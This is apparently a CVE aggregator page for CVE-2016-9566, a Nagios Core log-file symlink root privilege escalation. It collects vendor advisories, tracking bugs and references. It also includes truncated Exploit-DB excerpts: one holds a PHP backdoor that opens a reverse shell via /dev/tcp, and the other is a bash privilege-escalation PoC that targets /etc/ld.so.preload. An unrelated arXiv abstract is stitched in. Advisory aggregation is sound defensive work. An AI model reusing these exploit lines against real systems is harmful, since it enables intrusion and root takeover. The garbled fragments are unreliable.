CVE-2016-9566
Published 2016-12-15
Priority: P3 (51) · high · CVSS 3.0 base score 7.8
Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 4.88% (91.0th percentile)
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios | <= 4.2.3 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
| vendor_ubuntu | — | 5.5 | MEDIUM | — |
Ubuntu: Nagios regression
vendor_ubuntu · 2017-06-07 · CVSS 5.5 · MEDIUM
Summary: USN-3253-1 introduced a regression in Nagios.
USN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files
from being displayed in the web interface. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagi
Ubuntu: Nagios vulnerabilities
vendor_ubuntu · 2017-04-03 · CVSS 5.5 · MEDIUM · CVE-2013-7108
Summary: Several security issues were fixed in Nagios.
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagios incorrectly handled symlinks when
accessing log files. A local attacker could possibly use this issue to
elevate privileges. In the default installation of Ubuntu, this should be
prevented by the Yama link r
Red Hat: nagios: Privilege escalation issue
vendor_redhat · 2016-12-07 · CVSS 9.8 · CRITICAL · CVE-2016-9566 · CWE-59
A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the 'nagios' user/group) could use this flaw to elevate their privileges to root.
Package: nagios (Red Hat Mobile Application Platform 4) - Affected
Package: nagios (Red Hat OpenStack Platform 10 (Newton)) - Not affected
Package: nagios (Red Hat OpenStack Platform 8 (Liberty)) - Not affected
Package: nagios (Red Hat OpenStack Platform 9 (Mitaka)) - Not affected
GHSA: GHSA-9332-j4wp-2xcq: base/logging
ghsa_unreviewed · 2022-05-14 · CVSS 9.8 · CRITICAL · CVE-2016-9566 · CWE-59
OSV: nagios3 regression
osv · 2017-06-07 · CVSS 5.5 · MEDIUM · CVE-2013-7108
USN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files
from being displayed in the web interface. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagios incorrectly handled symlinks when
accessing log files. A lo
OSV: nagios3 vulnerabilities
osv · 2017-04-03 · CVSS 5.5 · MEDIUM · CVE-2013-7108
It was discovered that Nagios incorrectly handled certain long strings. A
remote authenticated attacker could use this issue to cause Nagios to
crash, resulting in a denial of service, or possibly obtain sensitive
information. (CVE-2013-7108, CVE-2013-7205)
It was discovered that Nagios incorrectly handled certain long messages to
cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to
crash, resulting in a denial of service. (CVE-2014-1878)
Dawid Golunski discovered that Nagios incorrectly handled symlinks when
accessing log files. A local attacker could possibly use this issue to
elevate privileges. In the default installation of Ubuntu, this should be
prevented by the Yama link restrictions. (CVE-2016-9566)
OSV: CVE-2016-9566: base/logging
osv · 2016-12-15 · CVSS 9.8 · CRITICAL · CVE-2016-9566
No detection rules found.
Exploit-DB: Nagios < 4.2.2 - Arbitrary Code Execution
exploitdb · 2016-12-15 · CVSS 9.8 · CRITICAL · CVE-2016-9565
Nagios /dev/tcp/192.168.57.3/8080 0&1 &'"); ?> is not blacklisted
#
# which will do the trick as it won't mess up the payload :)
self.add_header('Server', backdoor)
# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via tag :)
print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
self.write(xmldata)
self.finish()
tornado.ioloop.IOLoop.instance().stop()
if __name__ == "__main__":
global backdoor_path
global backdoor
print intro
# Set attacker's external IP & port to be used by the reverse shell
if len(sys.argv) /dev/tcp/%s/%s 0&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
# Feed XML containing JavaScript payload that will load the nagios
Exploit-DB: Nagios < 4.2.4 - Local Privilege Escalation
exploitdb · 2016-12-15 · CVSS 9.8 · CRITICAL · CVE-2016-9566
Nagios /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Ctrl+C pressed"
cleanexit 0
}
#intro
echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q nagios
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f "$ERRORLOG" ]; then
echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"
echo -e "./nagios-root-privesc.sh /usr/local
Bugzilla: CVE-2016-9566 nagios: Privilege escalation issue [fedora-all]
bugzilla · 2016-12-08 · CVSS 7.8 · HIGH · CVE-2016-9566
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fedora. While on
Bugzilla: CVE-2016-9566 nagios: Privilege escalation issue
bugzilla · 2016-12-08 · CVSS 7.8 · HIGH · CVE-2016-9566
An unsafe file opening/creation of logging files that can be misused for root privilege escalation was found in base/logging.c.
Upstream patch:
https://github.com/NagiosEnterprises/nagioscore/commit/c29557dec91eba2306f5fb11b8da4474ba63f8c4
Discussion:
Created nagios tracking bugs for this issue:
Affects: fedora-all [bug 1402870]
Affects: epel-all [bug 1402871]
---
An openshift user account is required to get access to the RHMAP Monitoring with Nagios, ref:
https://access.redhat.com/documentation/en/red-hat-mobile-application-platform/4.2/paged/operations-guide/chapter-1-monitoring-rhmap-with-nagios#retrieving-nagios-login-credentials
---
External Reference:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-
Bugzilla: CVE-2016-9566 nagios: Privilege escalation issue [epel-all]
bugzilla · 2016-12-08 · CVSS 7.8 · HIGH · CVE-2016-9566
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fedora EPEL.
arXiv: Extended Abstract: Mimicry Resilient Program Behavior Modeling with LSTM based Branch Models
arxiv_fulltext · 2018-03-24
Hayoon Yi (1; equal contribution), Gyuwan Kim (1, 2; equal contribution), Jangho Lee (1), Sunwoo Ahn (1), Younghan Lee (1), Sungroh Yoon (1; corresponding author), Yunheung Paek (1; corresponding author)
1: Dept. of Electrical and Computer Engineering, Seoul National University
2: Search Solutions, Inc
Email: hyyi,kgwmath,ubuntu,swahn,yhlee,sryoon,[email protected]
## Abstract
In software design, protecting a computer system from the plethora of software attacks or malware in the wild has become increasingly important. In one branch of research to detect the existence of attacks or malware, there has been much work focused on modeling the runtime behavior of a program. Stemming from the seminal work of Forrest et al., one of the main tools to model program
References
http://rhn.redhat.com/errata/RHSA-2017-0211.html
http://rhn.redhat.com/errata/RHSA-2017-0212.html
http://rhn.redhat.com/errata/RHSA-2017-0213.html
http://rhn.redhat.com/errata/RHSA-2017-0214.html
http://rhn.redhat.com/errata/RHSA-2017-0258.html
http://rhn.redhat.com/errata/RHSA-2017-0259.html
http://seclists.org/fulldisclosure/2016/Dec/58
http://www.securityfocus.com/bid/94919
http://www.securitytracker.com/id/1037487
https://bugzilla.redhat.com/show_bug.cgi?id=1402869
https://github.com/NagiosEnterprises/nagioscore/commit/c29557dec91eba2306f5fb11b8da4474ba63f8c4
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
https://lists.debian.org/debian-lts-announce/2018/12/msg00014.html
https://security.gentoo.org/glsa/201612-51
https://security.gentoo.org/glsa/201702-26
https://security.gentoo.org/glsa/201710-20
https://www.exploit-db.com/exploits/40921/
https://www.nagios.org/projects/nagios-core/history/4x/